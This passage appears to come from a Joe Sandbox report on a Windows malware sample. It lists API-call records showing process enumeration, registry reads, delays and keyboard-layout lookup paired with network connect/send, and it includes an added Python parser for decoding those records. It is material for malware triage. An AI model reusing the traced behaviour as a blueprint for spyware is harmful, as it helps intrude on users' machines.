                                • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: 8SG$exepath$hdF$Mw
                                • API String ID: 4119054056-3668720595
                                • Opcode ID: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                • Opcode Fuzzy Hash: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                Uniqueness

                                Uniqueness Score: -1.00%

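The "APIs" listings in these records are the quickest way to see what each function does, but the arguments are raw 8-digit hex and the "Part of subcall function" lines mix in calls made one level down. The following is an added example, not part of the Joe Sandbox report or its tooling: a Python parser for this listing format, with the process-enumeration record (CreateToolhelp32Snapshot at 0040F91B) and the HKCU registry / Sleep record (RegOpenKeyExA at 00413714) above copied in as the constructed sample. It decodes the arguments that matter for triage (OpenProcess access masks, Toolhelp snapshot flags, registry roots and SAM rights, CreateFileW access and disposition, Sleep duration) using the documented Win32 constant values; the constant tables cover only the APIs that appear in these records, and the behaviour tags at the end are this example's own heuristics, not Joe Sandbox signatures.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and decode the
raw hex arguments into Win32 constants.  Added example; not part of Joe Sandbox."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied from the process-enumeration record and the
# HKCU/Sleep record of this report, plus one argument-less CRT call.
SAMPLE = """\
  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
• CloseHandle.KERNEL32(00000000), ref: 0040FB05
  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
• Sleep.KERNEL32(00000BB8), ref: 0041277A
• _free.LIBCMT ref: 004493BD
"""

# One listing line: optional "Part of subcall function XXXXXXXX:", then
# Api.MODULE, optional "(args)", then "ref: <call-site address>".
LINE_RE = re.compile(
    r"""^\s*•\s*(?:Part\ of\ subcall\ function\ (?P<callee>[0-9A-F]{8}):\s*)?
        (?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)
        (?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$""",
    re.VERBOSE,
)

@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple            # raw tokens: 8-hex-digit values, '?' (unknown) or a literal
    ref: str               # address of the call instruction
    callee: Optional[str]  # function that actually contains the call, if a subcall

def parse_listing(text: str) -> list:
    """Return one Call per recognised line; unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            calls.append(Call(m["api"], m["module"], args, m["ref"], m["callee"]))
    return calls

# Bit-flag arguments (rendered as OR-ed names) and exact-value arguments,
# keyed by (API, zero-based argument index).  Only what these records use.
FLAGS = {
    ("OpenProcess", 0): {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD",
                         0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
                         0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION",
                         0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"},
    ("CreateToolhelp32Snapshot", 0): {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
                                      0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"},
    ("CreateFileW", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
}
ENUMS = {
    ("RegOpenKeyExA", 0): {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
                           0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"},
    ("RegOpenKeyExA", 3): {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"},
    ("CreateFileW", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("SetFilePointer", 3): {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"},
}

def decode_arg(api: str, index: int, token: str) -> str:
    """Render one raw argument; '?' and literal tokens (e.g. WinDir) pass through."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return token
    value = int(token, 16)
    if (api, index) in ENUMS:
        return ENUMS[(api, index)].get(value, hex(value))
    if (api, index) in FLAGS:
        table = FLAGS[(api, index)]
        names = [name for bit, name in table.items() if value & bit]
        leftover = value & ~sum(table)        # bits no table entry explains
        if leftover:
            names.append(hex(leftover))
        return "|".join(names) or "0"
    if api == "Sleep" and index == 0:
        return f"{value} ms"
    return hex(value)

def decode(call: Call) -> tuple:
    return (call.api, tuple(decode_arg(call.api, i, a) for i, a in enumerate(call.args)))

def behaviours(calls) -> set:
    """Coarse triage tags over a whole record, direct calls and subcalls alike.
    These are this example's own heuristics, not Joe Sandbox signatures."""
    apis = {c.api for c in calls}
    tags = set()
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= apis:
        tags.add("process-enumeration")
    if "OpenProcess" in apis:
        tags.add("opens-other-processes")
    if any(c.api == "RegOpenKeyExA" and c.args
           and decode_arg(c.api, 0, c.args[0]) == "HKEY_CURRENT_USER" for c in calls):
        tags.add("reads-hkcu")
    if "Sleep" in apis:
        tags.add("delays-execution")
    return tags

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        where = f"subcall {c.callee}" if c.callee else "direct"
        print(f"{c.ref}  {where:16} {decode(c)}")
    print(sorted(behaviours(parsed)))
```

Run against the sample, the two OpenProcess calls decode to PROCESS_QUERY_INFORMATION (0x400) and PROCESS_QUERY_LIMITED_INFORMATION (0x1000), the registry call to HKEY_CURRENT_USER opened with KEY_READ, and the Sleep to 3000 ms; the Toolhelp snapshot flag 0x2 is TH32CS_SNAPPROCESS. Reading the access masks this way matters in triage: neither OpenProcess call here requests VM_READ/VM_WRITE/CREATE_THREAD, so this particular routine is identifying processes rather than injecting into them, which is consistent with the "enumerate process and check for explorer.exe or svchost.exe" signature rather than with the injection itself.
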
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000), ref: 00448307
                                • SetLastError.KERNEL32(00000000), ref: 00448310
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpen$FileImageName
                                • String ID:
                                • API String ID: 2951400881-0
                                • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 004509D4
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                • String ID: (x$XQG$NG
                                • API String ID: 1634807452-1209448704
                                • Opcode ID: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                • Opcode Fuzzy Hash: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: `#D$`#D
                                • API String ID: 885266447-2450397995
                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                • GetLastError.KERNEL32 ref: 0044B931
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: PkGNG
                                • API String ID: 2456169464-263838557
                                • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
